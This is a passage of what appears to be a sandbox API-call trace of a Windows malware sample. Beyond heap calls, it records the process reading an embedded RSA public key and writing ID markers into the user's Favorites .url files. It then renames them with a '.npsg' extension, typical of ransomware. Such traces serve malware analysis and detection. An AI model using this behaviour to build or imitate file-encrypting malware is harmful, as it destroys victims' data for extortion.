(HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409680 [0237.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400788 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007b8 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400818 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007d0 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.878] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007b8 | out: hHeap=0x620000) returned 1 [0237.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007d0 | out: hHeap=0x620000) returned 1 [0237.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400818 | out: hHeap=0x620000) returned 1 [0237.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400818 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007d0 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34007b8 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007d0 | out: hHeap=0x620000) returned 1 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007b8 | out: hHeap=0x620000) returned 1 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400818 | out: hHeap=0x620000) returned 1 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.879] GetCurrentThreadId () returned 0x5b4 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82ca8 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.879] GetCurrentThreadId () returned 0x5b4 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0237.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400818 [0237.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007b8 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007d0 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007a0 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400830 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400800 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007e8 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400848 [0237.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007e8 | out: hHeap=0x620000) returned 1 [0237.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007e8 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007b8 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34007b8 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400818 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400848 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007b8 | out: hHeap=0x620000) returned 1 [0237.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007e8 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400830 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007d0 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007a0 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400788 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409680 | out: hHeap=0x620000) returned 1 [0237.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.884] WriteFile (in: hFile=0x644, lpBuffer=0x64e690*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x64e690*, lpNumberOfBytesWritten=0x39afb14*=0x80, lpOverlapped=0x0) returned 1 [0237.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.884] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.884] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.885] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.885] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.885] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.885] CloseHandle (hObject=0x644) returned 1 [0237.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0237.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.886] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.npsg")) returned 1 [0237.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.888] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70e008 | out: hHeap=0x620000) returned 1 [0237.889] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0237.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70e008 [0237.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.889] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0237.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.891] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.891] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.894] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.894] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.895] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.895] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.895] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.895] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.895] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.895] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.896] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.896] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.896] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.897] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.897] GetLastError () returned 0x0 [0237.897] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.897] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.897] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.897] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.897] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 